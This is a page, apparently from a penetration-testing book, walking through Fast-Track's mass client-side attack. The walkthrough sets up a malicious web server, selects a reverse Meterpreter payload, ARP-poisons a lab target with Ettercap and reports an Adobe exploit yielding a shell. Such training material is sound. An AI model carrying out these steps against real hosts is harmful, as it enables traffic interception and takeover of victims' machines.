background image

Fast-Track

175

Mass Client-Side Attack

The 

mass client-side attack

 is similar to the 

Browser Autopwn

 function; however, 

this attack includes additional exploits and built-in features that can incorpo-
rate ARP cache and DNS poisoning on the target’s machine, and additional 
browser exploits not included in Metasploit.

When a user connects to your web server, Fast-Track will fire off every 

exploit in its arsenal as well as those in the Metasploit Framework. If the 
user’s machine is susceptible to a specific vulnerability within one of these 
libraries, the attacker will obtain full access to the target machine.

 Enter the number: 

4

. . . SNIP . . .

 Enter the IP Address you want the web server to listen on: 

10.211.55.130

Specify your payload:

1. Windows Meterpreter Reverse Meterpreter
2. Generic Bind Shell
3. Windows VNC Inject Reverse_TCP (aka "Da Gui")
4. Reverse TCP Shell

 Enter the number of the payload you want: 

1

After selecting option 4, 

Mass Client-Side Attack

  , from the main menu, 

tell Fast-Track what IP address the web server should listen on  , and then 
choose a payload  .

Next, decide whether to use Ettercap to ARP-poison your target machine. 

Ettercap will intercept all requests that the target makes and redirect them to 
your malicious server. After confirming that you want to use Ettercap at  , 
enter the IP address of the target you want to poison  . Fast-Track will then 
go ahead and set up Ettercap   for you.

 Would you like to use Ettercap to ARP poison a host yes or no: 

yes

. . . SNIP . . .

 What IP Address do you want to poison: 

10.211.55.128

Setting up the ettercap filters....
Filter created...
Compiling Ettercap filter...

. . . SNIP . . .

 Filter compiled...Running Ettercap and poisoning target...

Once a client connects to your malicious server, Metasploit fires exploits   

at the target. In the following listing, you can see that the Adobe exploit is 
successful, and a Meterpreter shell is waiting  .